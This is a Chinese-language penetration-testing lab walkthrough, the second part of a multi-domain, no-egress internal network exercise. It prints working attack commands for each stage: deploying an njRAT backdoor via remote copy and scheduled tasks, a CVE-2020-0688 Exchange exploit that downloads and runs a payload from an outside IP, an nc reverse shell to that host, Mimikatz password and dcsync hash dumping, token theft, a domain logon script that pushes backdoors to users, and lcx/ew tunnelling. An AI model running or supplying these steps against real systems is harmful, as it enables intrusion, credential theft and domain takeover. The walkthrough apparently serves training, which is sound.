【项目九】​多层网络不出网多域渗透下

Delina

原文链接：【项目九】​多层网络不出网多域渗透下
​
1项目简介
项目九是一个多域控而且不出网的环境，是根据实际的环境改造而来。多个域控应用在大型内网中，其中域控分有主域控，支部域控。例如一个公司在北京有个总部办事处，广州有办事处，在上海也有办事处。每一个区域除了处理自身的事务。而且个各个地方办事处内部信息共享，信息同步等。多个域控也类似，可以信息同步。
本项目是一个不出网的环境，不出网就是内网不能访问外部。只允许入站，入网的意思是允许访问。本项目存在多个后端防火墙，可控制出站协议。存在多个DMZ（隔离区、非军事化区），也存在多个VPN点对点通信。
本项目不出网所以向metasploit 和cobalt strike这种针对内网渗透的工具都不能在当前环境使用，进行这种测试要用到许多的小工具和技巧，而且环境复杂测试起来要非常有耐心，非常考验渗透测试水平。
本项目是模拟红队对外网目标进行打点，经过多种渗透测试方法，找到入口点，接着通过入口点对内部网络进行渗透测试，并且打穿整个内网，拿到指定渗透域控，定位运维组人员，拿下运维机子，登录指定目标，获取信息。
本项目能学习WEB方面java框架的网站渗透，黑盒漏洞挖掘，垂直越权，水平越权，文件任意下载，多个逻辑漏洞，中间件tomcat利用，goby扫描器使用，xray被动扫描器使用、kali最版版本的使用，java应用环境搭建。
本项目能学习内网方面，不出网下渗透高度复杂的内网，域渗透、多域渗透、exchange破解、，包括代理隧道、端口转发，多层网络横向渗透，跨网段渗透，突破防火墙、渗透防火墙、ICMP反弹shell、DNS后门，IPC内网渗透，kali渗透，端口扫描，mimikatz、nc反弹shell、密码记录，token令牌获取，njrat远控，ladon扫描器、Behinder等工具的使用。。
上一篇 多层网络不出网多域渗透上
在12server4使用工具扫描内网
​
上传检测工具到服务器进系操作。当前网段存在的机子
5.6 横行渗透第第二层网络
在这台服务器上发现存在vpn连接拨入连接
​
Vpn 服务器的ip192.168.22.132 03server1
​
5.7 配置远控njRAT v0.7d
njRAT是一款红队的著名的远控支持多种平台使用。
反向连接的ip和端口。
​
设置成功后build即可生成server后门。
5.8 获取vpn服务器权限

1. copy Server.exe \\192.168.22.132\c$
   
2. at\\ 192.168.22.132 16:20:00 c:/Server.exe

复制代码

​
上线
​
5.8.1 开启3389远程终端
Wmic开启
wmic path win32_terminalservicesetting where(__CLASS != "") call setallowtsconnections 1
5.8.2 注册表开启3389
reg add"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5.8.3 终端远程连接vpn服务器拿下
​
5.9 VPN服务器信息收集
5.9.1 开放服务 DNS
自带dns服务器发现现在两个域名
分别是
blue.com
moonteam.com
​
5.9.2  POP3服务开启
​
5.9.3 邮箱密码获取
Mailpv.exe
​
5.9.4 Mimikatz系统密码哈希
上传x86mimikatz获取明文

1. privilege::debug
   
2. sekurlsa::logonpasswords

复制代码

​
5.10 查看邮件服务
查询邮箱记录
​
https://mail.moonteam.com/owa/au ... owa%2f&reason=0
​
5.11 Ew 与SocksCap64设置socks5代理访问内网
​​
因为2003很多工具都不支持使用特别是powershell和net4.0都不能安装所以设置代理在12server4测试安全。

• 
  

ew_for_Win -s ssocksd -l 7788
​
​
5.12 Burpsuite设置上游代理穷举exchange2013账号和密码
​
SocksCap64开启系统代理
​
导入常用账号和密码提交即可
​
登录成功。
​
5.13  Exchange信息收集
owa/auth/15.0.1076/
exchange2013 CU8
​
​
5.14 利用CVE-2020-0688远程代码执行漏洞
存在漏洞的版本只需要普通的用户即可。
MicrosoftExchange Server 2010 Service Pack 3
MicrosoftExchange Server 2013
MicrosoftExchange Server 2016
MicrosoftExchange Server 2019
使用SocksCap64隧道执行命令 把python加入隧道
​
执行命令将后门下载到c盘的下
CVE-2020-0688_EXP.py -s https://mail.moonteam.com-u moonteam\moonsec -p QWEasd456 -c "powershell (new-objectSystem.Net.WebClient).DownloadFile('http://61.100.100.129/2.exe','c:/233.exe')"
执行后门
CVE-2020-0688_EXP.py -s https://mail.moonteam.com -u moonteam\moonsec -p QWEasd456 -c "cmd/c c:/233.exe"
​
当前的渗透图
​
5.15 第三层内网渗透
5.16 针对exchang服务器信息收集
当前权限是system
​
DNS
主10.10.10.2.128
备10.10.10.2131
域moonteam.com
使用mimikta读不出明文。
5.17 incognito 窃取令牌域管理权限
当前的权限是system限制太多了。导致一些域命令不能使用。
当前的环境又不是交互环境。首先窃取域管令牌再用njrat后门上线。
incognito.exe list_tokens -u
​
存在域管管理员执行后门上线。
incognito.exe execute -c "moonteam\administrator" c:\666.exe
​
5.18 NC反弹交互CNDSHEL
本地服务监听
nc -lvnp 9999
Exchange上执行
c:\nc.exe-e cmd.exe 61.100.100.129 9999
​
5.19 Mimikatz dcsync导出域控用户所有hash

1. privilege::debug
   
2. lsadump::dcsync/domain:moonteam.com /all /csv

复制代码

​
5.20 查看当前FSMO主机角色信息
​​
netdomquery fsmo
​
5.21 列出域内组织
dsqueryou
​
5.22 列出所有域服务器
dsquery server && net time /domain
​
5.23 列出域内的所有计算机名
dsquery computer domainroot -limit 65535 && net group "domaincomputers" /domain
​
5.24 列出域内的所有用户
dsquery user domainroot -limit 65535 && net user /domain
​
5.25 获取广州支部域控权限
copy666.exe \\12dc2\c$
设置任务时间以系统权限启动
schtasks /create /s 10.10.2.129  /ru "SYSTEM"/tn addexe /sc DAILY /st 20:38:00 /tr c:\\666.exe /F
启动任务
schtasks /run /s 10.10.2.129 /tn addexe /i
查询任务
schtasks.exe /query /s 10.10.2.129 /tn addexe
删除命令
schtasks/delete /s 10.10.2.129 /tn addexe /f
​
​
域控权限已经获取同意的总部权限也是相同方法获取。
5.26 渗透广州支部运维组
现在已经获取域控的权限，域内的主机都可以控制。在内网较多的权限在运维组，如果在内网控制运维组，基本上可以得到所有在域以外的服务器。如果短期无法获取目标的信息，可以长期监控记录 运维组，一定会有所收获。
获取运维组成员权限。
扫描c段
nbtscan -r 10.10.2.0/24
​
5.27 域控下发文件并执行获取运维组主机权限
在前面发现用户xiaoa和xiaob都是广州运维组的成员用户。获取了域控的权限，设置用户在开机登录时候时候执行脚本，下发文件执行后门。
保存logon.bat

1. net use \\10.10.2.131 QWEasd123 /user:moonteam\administrator
   
2. copy\\10.10.2.131\c$\666.exe c:\users\%username%\666.exe
   
3. cmd /c start c:\users\%username%\666.exe

复制代码

存放在域控scripts下
C:\Windows\SYSVOL\sysvol\moonteam.com\scripts\
设置用户登录加载脚本

1. netuser xiaoa /scriptpath:logon.bat
   
2. netuser xiaob /scriptpath:logon.bat

复制代码

​
​
域用户登录后会自动下载后门并且执行。
收集信息的时候发现。3389登录信息
​
5.28 开启广州12dc域控3389

1. reg add"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
   
2. netstat-ano| findstr "3389"

复制代码

​
5.29 Lcx转发3389隧道连接

1. lcx.exe -listen 2333 5678
   
2. lcx.exe -slave  61.100.100.129 2333 10.10.2.129 3389

复制代码

​
转发成功但是协议不对。
5.30 Lcx配合ew穿透内网
上面出现这种错误是因为版本过低导致的。
使用ew代理在03server3设置代理。
ew_for_Win -s ssocksd -l 7788
使用lcx继续转发

1. lcx.exe -listen 2333 5678
   
2. lcx.exe -slave  61.100.100.129 2333 10.10.2.129 3389

复制代码

在12server4服务器上连接03server3的远程终端即可连接到内网的广州0域控12dc2
​​
在隧道里执行mstsc.exe192.168.22.132:5678
​
​
​
​
5.31 登录08server1 10.10.2.144
本地管理员已经登录成功
​
5.32 横向渗透第四层网络
在这台服务器上发现vpn.txt 也存在vpn连接
​
​
10.10.2.134是vpn服务器
arp -a 发现主机。
​
5.33 弱口令登录目标主机
QWEasd123456
​
​
这就是最终的目标机子。最终的突破图
​
如果你觉得本文不错，点赞转发分享给你的朋友谢谢
​